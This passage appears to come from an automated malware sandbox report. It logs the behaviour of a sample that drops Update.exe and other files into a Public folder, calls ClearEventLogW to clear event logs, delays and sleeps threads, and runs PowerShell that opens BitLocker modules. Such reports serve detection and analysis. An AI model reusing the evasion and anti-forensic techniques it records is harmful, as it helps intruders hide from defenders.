                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037FB3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,3_2_037FB3C0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeWindow / User API: threadDelayed 5869Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3806Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 647Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8185Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1414Jump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeDropped PE file which has not been started: C:\Users\Public\Bilite\ldplayer9_ld_6000_ld.exeJump to dropped file
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 5780Thread sleep time: -73000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 4996Thread sleep time: -63000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 6176Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 3620Thread sleep count: 299 > 30Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 5368Thread sleep count: 5869 > 30Jump to behavior
